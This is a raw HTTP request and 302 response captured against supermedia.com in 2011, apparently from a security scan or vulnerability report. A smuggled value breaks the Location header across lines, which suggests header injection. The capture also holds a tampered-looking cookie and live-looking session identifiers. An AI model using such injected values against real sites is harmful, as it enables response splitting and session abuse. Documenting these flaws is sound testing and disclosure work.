Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; mbox=check#true#1296759589|session#1296759528614-838261#1296761389; s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 302 Moved Temporarily
Server: Unspecified
Date: Thu, 03 Feb 2011 19:12:37 GMT
Location: https://www.supermedia.com/spportal/spportalFlow.do3e3db
b735c4f3a4c
?fromPage=login&_flowId=loginact-flow
Content-Length: 0
Connection: close
